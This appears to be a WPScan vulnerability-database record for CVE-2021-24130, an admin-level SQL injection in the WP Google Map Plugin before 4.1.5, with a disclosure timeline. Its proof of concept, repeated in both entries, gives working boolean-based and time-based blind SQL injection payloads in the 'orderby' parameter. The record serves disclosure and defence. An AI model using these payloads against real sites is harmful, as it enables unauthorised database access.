Unvalidated input on the Manage Locations page within the plugin settings of the WP Google Map Plugin WordPress plugin, versions before 4.1.5, allowed SQL injection by a high-privileged user (admin+).
{"wpvulndb": [{"lastseen": "2021-02-15T22:32:03", "bulletinFamily": "software", "cvelist": ["CVE-2021-24130"], "description": "The Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+). Edit (WPScanTeam): September 8th, 2020 - Confirmed & Escalated to WP plugins team September 8th, 2020 - WP plugins team investigating November 25th, 2020 - No updates, disclosing December 8th, 2020 - v4.1.4 released, issue still present (improper fix) January 27th, 2021 - v4.1.5 released, fixing the issue\n\n### PoC\n\n\\- Vulnerable parameters: `order` and `orderby` 1\\. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=desc&orderby=(sleep(5)) 2\\. The request will be delayed by 10 seconds. \\--- Parameter: #1* (URI) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(SELECT (CASE WHEN (2605=2605) THEN '' ELSE (SELECT 3517 UNION SELECT 5558) END)) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END) \\--- \n", "modified": "2021-02-01T11:01:42", "published": "2020-11-25T00:00:00", "id": "WPVDB-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8", "href": "https://wpscan.com/vulnerability/46af9a4d-67ac-4e08-a753-a2a44245f4f8", "type": "wpvulndb", "title": "WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpexploit": [{"lastseen": "2021-02-15T22:32:03", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24130"], "description": "The Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+). Edit (WPScanTeam): September 8th, 2020 - Confirmed & Escalated to WP plugins team September 8th, 2020 - WP plugins team investigating November 25th, 2020 - No updates, disclosing December 8th, 2020 - v4.1.4 released, issue still present (improper fix) January 27th, 2021 - v4.1.5 released, fixing the issue\n", "modified": "2021-02-01T11:01:42", "published": "2020-11-25T00:00:00", "id": "WPEX-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8", "href": "", "type": "wpexploit", "title": "WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection", "sourceData": "- Vulnerable parameters: `order` and `orderby`\r\n\r\n1. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query:\r\n\r\nhttps://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=desc&orderby=(sleep(5))\r\n\r\n2. The request will be delayed by 10 seconds.\r\n\r\n---\r\nParameter: #1* (URI)\r\n Type: boolean-based blind\r\n Title: Boolean-based blind - Parameter replace (original value)\r\n Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(SELECT (CASE WHEN (2605=2605) THEN '' ELSE (SELECT 3517 UNION SELECT 5558) END))\r\n\r\n Type: time-based blind\r\n Title: MySQL >= 5.0.12 time-based blind - Parameter replace\r\n Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END)\r\n---\r\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}